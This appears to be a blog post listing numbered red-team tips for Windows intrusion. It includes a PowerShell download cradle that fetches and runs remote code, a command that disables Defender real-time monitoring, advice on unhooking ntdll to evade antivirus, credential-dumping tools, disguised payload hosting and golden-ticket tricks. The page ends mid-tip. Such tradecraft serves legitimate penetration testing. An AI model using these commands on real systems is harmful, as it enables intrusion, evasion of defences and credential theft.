Skip to content

Red Team Tips

#0: Need good blog posts/references? consider ired.team ijustwannared.team XPN’s Blog https://offensivedefence.co.uk/ and Vincent Yui’s Red Team Tips

#1 The standard powershell downloadcradle (IEX New-Object….) is NOT proxy aware. A far superior alternative is the following one liner:

$webclient=(New-Object Net.WebClient);$webclient.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $webclient.DownloadString("")

#2 Feeling like you hit a dead end in your enumeration? Consider SQL servers… They are often overlooked, and can easily be exploited for RCE (think potato exploits). NETSPI is an expert in DB exploitation. https://github.com/NetSPI I highly recommend powerupsql if you can manage to load powershell undetected.

#3 The command to list AV products is

powershell: 
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct

WMIC: 

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

#4 Only got CIFS TGS? you can still use sc to enable/disable/register new services on remote computers.

#5 The command to disable realtimonitoring is
Set-MpPreference -DisableRealtimeMonitoring $true
This is NOT opsec safe (duh).

#6 unhook ntdll.dll and all your AV problems go away 🙂
A good starting point is
https://ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++

#7 In my honest opinion, https://github.com/skelsec/pypykatz is superior to mimikatz itself for reading out dumps and registry keys. It’s python based so works cross OS. pretty damn sweet.

#8. Don’t use SimpleHTTPServer anymore, use the much better UpDog instead (it has uploading functionalities!) https://github.com/sc0tfree/updog

#9. Pwndrop is another nice alternative for quickly hosting payloads, and it has facade options to prevent snooping eyes. https://github.com/kgretzky/pwndrop

#10. Need a powershell web server for some reason? use this one! https://gallery.technet.microsoft.com/scriptcenter/Powershell-Webserver-74dcf466
it has script execution,command execution, and download functionalities

#11. You need quote escapes in powershell? there are a few different options, either use backslash (\) to escape quotes or use encodedcommands instead. pro tip, chaining powershell commands can be done, even incoded by just using “;” as a separator for commands. ex. whoami;whoami /priv

#12. Ever in a restricted environment, or using a tool that needs an argument to spawn a new shell? use .bat files or .cmd files like so:

@echo off 
powershell.exe -noexit ## or any other powershell command you need.

#13. powershell script to c#? no problem! https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs

#14. need to get rid of applocker (after you bypassed it initially)? https://github.com/api0cradle/AppLocker-Stuff

#15. Using Costura to package your c#? @cobbr says “Be sure to install Costura v1.6.2 to work with .NET Framework v3.5 assemblies”

#16. @0gtweet tweeted an interesting thing: ” an undocumented -encodedarguments PowerShell parameter. It may be shortened to “ea” or “encodeda”.

#17. @mpgn_x64 said: Struggling with golden ticket and access denied ? Use ‘klist add_bind’ command after injecting your ticket with mimikatz or rubeus. (tweet)

#18. Ever needed to know what regkey is being edited by mdm or gpo? check this site: https://getadmx.com/?Category=Windows_10_2016

#19. You’ll need local admin rights to change registry keys in HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\

#20. you can pass cmd args from explorer window, for example